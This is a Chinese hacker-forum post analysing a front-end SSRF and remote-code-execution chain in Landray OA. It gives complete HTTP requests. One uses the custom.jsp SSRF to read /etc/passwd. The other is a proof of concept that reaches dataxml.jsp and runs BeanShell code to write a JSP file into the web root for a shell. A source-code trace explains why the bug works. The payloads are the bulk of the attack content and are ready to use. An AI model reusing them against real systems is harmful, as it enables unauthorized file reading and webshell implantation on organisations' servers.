• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

蓝凌OA前台SSRF+dataxml.jsp RCE漏洞分析


Recommended Posts

SSRF漏洞

漏洞路径:/sys/ui/extend/varkind/custom.jsp

btekb6.png
<c:import>标签提供了所有<jsp:include>行为标签所具有的功能,同时也允许包含绝对URL。举例来说,使用<c:import>标签可以包含一个FTP服务器中不同的网页内容。
url:待导入资源的URL,可以是相对路径和绝对路径,并且可以导入其他主机资源

<c:param> 标签用于在 <c:url> 标签中指定参数,而且与 URL 编码相关。
在 <c:param> 标签内,name 属性表明参数的名称,value 属性表明参数的值。

使用 SSRF 读取文件

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 1.1.1.1
Content-Length: 42
Pragma: no-cache
Cache-Control: no-cache
Origin: http://1.1.1.1
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://1.1.1.1/sys/ui/extend/varkind/custom.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=060EB9D7EC3DA6E910B89F3D67BAB52C
Connection: close


var={"body":{"file":"file:///etc/passwd"}}
bteRz9.png

使用dataxml.jsp 任意执行代码

参考链接:https ://websecuritys.cn/archives/lanling2.html
https://blog.csdn.net/ouyang111222/article/details/48474189

POC

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Go-http-client/1.1
Content-Length: 526
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip


var={"body":{"file":"/sys/common/dataxml.jsp"}}&s_bean=sysFormulaValidate&script=
import%20java.lang.*;import%20java.io.*;Class%20cls=Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter");String%20path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();File%20f=new%20File(path.split("WEB-INF")[0]%2B"/loginx.jsp");f.createNewFile();FileOutputStream%20fout=new%20FileOutputStream(f);fout.write(new%20sun.misc.BASE64Decoder().decodeBuffer("aGVsbG8="));fout.close();&type=int&modelName=test

 

获取实例化的bean的或者在xml中定义),获取调用getDataList函数的名称,调用bean请求上下文,然后进入调用getBean函数参数

btejsI.png

s_bean=sysFormulaValidate,搜索sysFormulaValidate

btmCFS.png

在 spring.xml 中可以看到

btmFzj.md.png

找个jar包,对着getDataList按两下shift。定位到IXMLDataBean.class

btmAQs.png

接口找到

btmee0.png
btmKFU.png
btm3l9.png

可以看到先获取了脚本参数,然后调用parseValueScript函数

btmaFO.png

继续往下跟

btmr6A.png

首先判断脚本是否为NULL,不为NULL结尾去存在特殊字符和空格。然后判断是否存在$,如果则进入while循环删除$

btmsOI.md.png
btmgTf.png

动态请求,然后调用interpreter.eval()
bsh(BeanShell)java执行代码:https://blog.csdn.net/ouyang111222/article/details/48474189

btmoXn.png
btn0EV.png

使用写文件getshell

import%20java.lang.*;import%20java.io.*;Class%20cls=Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter");String%20path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();File%20f=new%20File(path.split("WEB-INF")[0]%2B"/loginx.jsp");f.createNewFile();FileOutputStream%20fout=new%20FileOutputStream(f);fout.write(new%20sun.misc.BASE64Decoder().decodeBuffer("aGVsbG8="));fout.close();

loginxx.jsp访问是200,spring.xml允许匿名访问

btuSPS.png
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now